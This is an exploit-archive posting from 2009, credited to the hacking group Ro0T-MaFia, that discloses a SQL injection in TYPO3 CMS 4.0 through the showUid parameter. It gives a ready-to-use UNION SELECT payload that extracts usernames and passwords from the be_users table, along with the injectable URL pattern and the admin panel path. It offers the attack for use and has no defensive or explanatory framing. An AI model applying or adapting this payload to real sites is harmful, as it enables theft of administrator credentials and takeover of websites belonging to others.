[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TYPO3 CMS 4.0 (showUid) Remote SQL Injection Vulnerability
# Published : 2009-08-06
# Author : Ro0T-MaFia
# Previous Title : PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities
# Next Title : LM Starmail 2.0 (SQL Injection/File Inclusion) Multiple Vulnerabilities
#-----
TYPO3 CMS 4.0 SQL-Injection Vulnerability
#-----
#####################################################
# [+] Author : CyberNaj, JxE-13 #
# [+] Vulnerability : SQL injection #
# [+] Group : Ro0T-MaFia #
#####################################################
#-----
Info CMS:
* Name : TYPO3
* Web : http://typo3.org
* dowloand : http://typo3.org/download/packages/
* Country : Venezuela
#-----
Vulnerability:
http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]
SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users--
Admin Panel: /typo3/index.php
#-----
# www.Syue.com [2009-08-06]